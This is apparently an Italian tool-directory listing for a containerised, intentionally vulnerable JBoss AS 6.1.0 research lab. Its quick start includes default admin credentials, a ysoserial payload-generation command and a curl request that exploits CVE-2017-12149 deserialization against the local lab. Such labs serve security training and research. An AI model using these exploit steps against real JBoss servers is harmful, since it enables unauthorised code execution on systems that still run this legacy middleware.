Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/galois17/cve-2017-12149-playground
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneBinary Exploitation
GitHubgalois17/cve-2017-12149-playground

cve-2017-12149-playground

Laboratorio di ricerca containerizzato JBoss AS 6.1.0 per dimostrare vulnerabilità Java Deserialization (CVE-2017-12149) e JBoss Seam EL Injection con fasi di verifica dell'exploit preconfigurate.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
48 mesi faNon ancora revisionato

Molte industrie critiche (bancarie, sanitarie e manifatturiere) si affidano a middleware legacy progettati per funzionare specificamente su JBoss 5 o 6. Poiché queste applicazioni sono spesso troppo fragili per essere migrate a versioni moderne di WildFly (il successore di JBoss), le organizzazioni scelgono di "air-gap" o nasconderle dietro VPN piuttosto che aggiornarle. Quando le difese perimetrali vengono violate, la vulnerabilità è ancora presente, viva e non corretta.

JBoss AS 6.1.0 Vulnerability Research Lab

Questo repository fornisce un ambiente JBoss Application Server 6.1.0 containerizzato, configurato specificamente per la ricerca sulla sicurezza e la verifica delle vulnerabilità. È progettato per dimostrare le vulnerabilità di deserializzazione Java e di iniezione EL di JBoss Seam.


Quick Start

1. Build e Avvio

Per garantire che le credenziali personalizzate e le configurazioni siano applicate correttamente, costruisci il container da zero:

root@kitploit:~
docker-compose build --no-cache
docker-compose up -d

2. Accesso all'Ambiente

Console JBoss: http://localhost:8080/admin-console/

Nome utente: admin

Password: admin

Verified Vulnerabilities

1. Deserializzazione Java (CVE-2017-12149)

Il percorso di exploit più affidabile in questo ambiente è attraverso HTTPServerILServlet situato in /invoker/readonly.

Passaggi di verifica:

Genera un payload usando ysoserial per creare un file in /tmp:

root@kitploit:~
java -jar ysoserial-all.jar CommonsCollections6 "touch /tmp/pwned" > poc.ser

Invia il payload binario tramite curl:

root@kitploit:~
curl -v -X POST --data-binary @poc.ser http://localhost:8080/invoker/readonly

Conferma che l'exploit ha funzionato:

root@kitploit:~
docker exec -it jboss-custom-lab ls /tmp/pwned

Security Disclaimer

Questo ambiente è intenzionalmente vulnerabile. Contiene software non aggiornato e giunto a fine vita.

NON distribuire questo ambiente su un server pubblico.

NON utilizzare questi strumenti su sistemi per cui non hai esplicita autorizzazione al test.

Sviluppato a scopo educativo e per la ricerca sulla sicurezza.

Dipendenze: https://github.com/frohoff/ysoserial

Scarica lo strumento